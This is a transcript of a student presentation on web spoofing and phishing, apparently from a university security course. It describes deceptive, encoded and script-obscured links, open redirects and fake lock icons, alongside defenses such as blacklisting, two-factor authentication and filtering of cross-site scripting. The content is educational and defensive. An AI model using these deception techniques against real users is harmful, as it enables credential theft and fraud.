Web Spoofing - PowerPoint PPT Presentation

About This Presentation
Title:

Web Spoofing

Description:

Is a form of identity theft in which deception is used to trick a user into ... Blacklisting Block IP ranges of known phishing sites. ... – PowerPoint PPT presentation

Number of Views:377
Avg rating:3.0/5.0
Slides: 23
Provided by: mikef69
Learn more at: http://www.cs.fsu.edu
Category:

less

Transcript and Presenter's Notes

Title: Web Spoofing


1
Web Spoofing
Steve Newell Mike Falcon Computer Security
CIS 4360
2
Web Spoofing
Introduction
  • Phishing
  • Is a form of identity theft in which deception
    is used to trick a user into revealing
    confidential information that has economic value.

3
Web Spoofing
Introduction
  • Definition
  • Website spoofing is the act of creating a
    website, as a hoax, with the intention of
    misleading readers that the website has been
    created by a different person or organization.
  • Web spoofing is a phishing scheme

4
Web Spoofing
Statistic
  • The Gartner group estimates the direct
    phishing-related loss to US banks and credit card
    issuers in the last year to be 1.2 billion.
  • Indirect losses are much higher, including
    customer service expenses and account replacement
    costs.

5
Web Spoofing
Chart
6
Web Spoofing
Phishing Technologies
  • The goal of phishing is to deceive the user via
    the following ways
  • Deceiving a user into believing a message comes
    from a trusted source.
  • Deceiving a user into believing that a web site
    is a trusted institution.
  • Deceiving a spam filter to classify a phishing
    email is legitimate.

7
Web Spoofing
Deception
  • Deceptive return address information
  • Attempts to appear as a trusted source
  • Fraudulent request for action
  • Prompts user to provide information.
  • Deceptive appearance
  • - Mimics visual target site

8
Web Spoofing
Deceptive Links
  • Misleadingly named http//security.commerceflow.co
    m will lead to http//phisher.com
  • RedirectedIf the targeted company has an open
    redirect, then this can be used to redirect a
    legitimate URL to a phishing site.

9
Web Spoofing
Deceptive Links
  • Obfuscated Using encoded characters to hide the
    destination address of a link. abc
    "979899
  • Programmatically ObscuredUsing a scripting
    language such as Javascript to hide the
    destination of a link address. For example, using
    the mouse-over function.

10
Web Spoofing
  • Not possible to determine whether a connection to
    a site is secure by looking at a lock icon in a
    browser
  • A lock icon by itself means only that the site
    has a certificate
  • It is possible to get a browser to display a lock
    icon using a self-signed certificate
  • A lock icon may be overlaid on top of the browser
    using the same technologies used to fake the URL
    bar

Deceptive Location
11
Web Spoofing
Information Flow Model
12
Web Spoofing
Information Flow Model
  1. A deceptive message is sent from the phisher to
    the user.
  2. A user provides confidential information to a
    phishing server (normally after some interaction
    with the server).
  3. The phisher obtains the confidential information
    from the server.
  4. The confidential information is used to
    impersonate the user.
  5. The phisher obtains illicit monetary gain.

13
Web Spoofing
Prevention
  • Preventing phishing attacks
  • The average phishing site stays active no more
    than 54 hours
  • Pre-emptive domain registration
  • Holding period for new domain registrations
  • E-mail authentication could prevent forged or
    misleading email return addresses.

14
Web Spoofing
  • Defenses

Defenses Against Early User Actions
  • Open Information Allow different spam filters,
    e-mail clients, and browsers to exchange
    information about unsafe domains.
  • Warn The User Alert the user when they attempt
    to click on an obfuscated link. Show the user the
    actual link, whether the site is trusted or not,
    and prompt the user whether or not the wish to
    continue with the link.

15
Web Spoofing
Defenses
  • Disrupting Data Transmission
  • Monitor Outgoing Data Implement a browser
    tool-bar that hashes information and checks if
    confidential information is being sent.
  • Blacklisting Block IP ranges of known phishing
    sites.
  • Encryption Encrypt sensitive information before
    transmission.

16
Web Spoofing
  • Defenses
  • Advanced Authentication
  • Two-factor Authentication Require proof of two
    out of three criteria (what you are, what you
    have, or what you know)
  • Requires some sort of hardware or time sensitive
    information
  • Use a checksum to verify that the information
    came from the users machine and not a phisher.


17
Web Spoofing
Cross-site Scripting
  • Cross-site scripting is inserting a malicious
    script inside a secure domain.
  • A phisher could insert a malicious script inside
    of an auction or a product review to attack the
    user.
  • The script would modify the host site so that the
    user believes he/she is interacting with the
    secure site.
  • Difficult to write sufficient filter to remove
    cross-site scripting. How do you know if a script
    is malicious?
  • Cross-site scripting could be hindered by
    introducing a ltnoscriptgt tag on user supplied
    content.

18
Web Spoofing
Examples
Example 1 http//www.msfirefox.com/ http//www.msf
irefox.net/ Example 2 Florida Commerce Credit
Union Example 3 Thomas Scotts Parody Unofficial
site Official site
19
Web Spoofing
Leading Nations
20
Web Spoofing
Conclusion
  • Current technology is unable to completely stop
    phishing and web spoofing.
  • Improvements in security technology can
    drastically reduce the amount of phishing schemes.

21
Web Spoofing
Videos
  • Documentary Footage
  • Identity theft victims
  • Dont let this happen to you.

22
Web Spoofing
  • ANY QUESTIONS?
Write a Comment
User Comments (0)
About PowerShow.com